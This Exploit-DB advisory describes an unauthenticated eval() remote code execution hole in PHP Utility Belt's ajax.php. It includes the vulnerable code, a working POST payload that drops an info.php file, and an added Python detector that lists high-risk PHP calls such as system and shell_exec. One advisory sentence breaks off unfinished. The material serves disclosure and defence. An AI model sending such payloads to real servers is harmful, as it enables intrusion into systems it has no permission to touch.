PHP Utility Belt - Remote Code Execution

ID EDB-ID:38901
Type exploitdb
Reporter WICS
Modified 2015-12-08T00:00:00


PHP Utility Belt - Remote Code Execution. Webapps exploit for php platform

Exploit Title : PHP utility belt Remote Code Execution vulnerability
Author        : WICS
Date          : 8/12/2015
Software Link :


PHP Utility Belt is a set of tools for PHP developers. It is installed in a browser-accessible directory and used from there.
ajax.php is reachable without any authentication.

Vulnerable code (lines 12 to 15):

// The raw POST parameter is handed straight to eval(); there is no
// authentication, origin check or restriction on what the code may do.
if ( isset( $_POST['code'] ) ) {
  if ( false === eval( $_POST['code'] ) )
    echo 'PHP Error encountered, execution halted';
}

Access the URL of ajax.php and send the following POST form data:

code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');

The payload above writes an info.php file that displays the phpinfo() output.
Shell link will be
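Added detection and mitigation example (written for this page, not part of the advisory or of PHP Utility Belt): it parses captured HTTP requests, flags POSTs to ajax.php that carry a code parameter, marks payloads that reach file or process functions, and applies the access policy a defender would want for a developer tool of this kind. The loopback-only rule and the X-Utility-Belt-Token header are assumptions introduced here, not something the project implements. The sample traffic is constructed; the first request reuses the advisory's own payload, URL-encoded.

```python
"""Detect requests to PHP Utility Belt's unauthenticated eval endpoint.

Added example, not the project's code: inspects captured HTTP requests,
flags POSTs to ajax.php that carry a ``code`` parameter, and applies an
assumed mitigation policy (loopback caller plus shared secret).
"""
import hmac
import posixpath
from urllib.parse import parse_qs, urlsplit

# Hypothetical shared secret a hardened deployment would require.
EXPECTED_TOKEN = "example-dev-token"

# PHP functions whose presence in an eval'd payload indicates file or
# process access rather than a developer's scratch snippet.
HIGH_RISK_CALLS = ("fopen", "fwrite", "file_put_contents", "system",
                   "exec", "shell_exec", "passthru", "proc_open")


def parse_request(raw: str) -> dict:
    """Split raw HTTP/1.1 request text into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": urlsplit(target).path,
            "headers": headers, "body": body}


def classify(req: dict, client_ip: str) -> dict:
    """Return a verdict for one request against the ajax.php eval sink."""
    verdict = {"hits_eval_sink": False, "high_risk": False, "allowed": True}
    if req["method"] != "POST" or posixpath.basename(req["path"]) != "ajax.php":
        return verdict
    form = parse_qs(req["body"], keep_blank_values=True)
    if "code" not in form:
        return verdict
    code = form["code"][0]
    verdict["hits_eval_sink"] = True
    verdict["high_risk"] = any(call in code for call in HIGH_RISK_CALLS)
    # Assumed policy: the tool is a developer utility, so only loopback
    # callers presenting the shared secret may reach eval().
    token = req["headers"].get("x-utility-belt-token", "")
    verdict["allowed"] = (client_ip in ("127.0.0.1", "::1")
                          and hmac.compare_digest(token, EXPECTED_TOKEN))
    return verdict


# Constructed sample traffic; the first body is the advisory's payload.
SAMPLE_TRAFFIC = [
    ("203.0.113.7",
     "POST /php-utility-belt/ajax.php HTTP/1.1\r\nHost: dev.example\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     "code=fwrite%28fopen%28%27info.php%27%2C%27w%27%29%2C"
     "%27%3C%3Fphp+echo+phpinfo%28%29%3B%3F%3E%27%29%3B"),
    ("127.0.0.1",
     "POST /php-utility-belt/ajax.php HTTP/1.1\r\nHost: localhost\r\n"
     "X-Utility-Belt-Token: example-dev-token\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     "code=echo+strlen%28%27abc%27%29%3B"),
    ("203.0.113.7",
     "GET /php-utility-belt/index.php HTTP/1.1\r\nHost: dev.example\r\n\r\n"),
]


def scan(traffic=SAMPLE_TRAFFIC) -> list:
    """Classify every request in the capture; one verdict per request."""
    return [classify(parse_request(raw), ip) for ip, raw in traffic]


if __name__ == "__main__":
    for (ip, _), verdict in zip(SAMPLE_TRAFFIC, scan()):
        print(ip, verdict)
```

Run as a script it prints one verdict per sample: the external POST carrying fwrite/fopen is flagged as a high-risk hit and denied, the loopback request with the correct token is a hit but permitted, and the GET to index.php is not a hit at all. The same classify() logic can sit in a reverse proxy or be replayed over a packet capture; in either case the durable fix is to keep ajax.php off any network-reachable host rather than to rely on the filter.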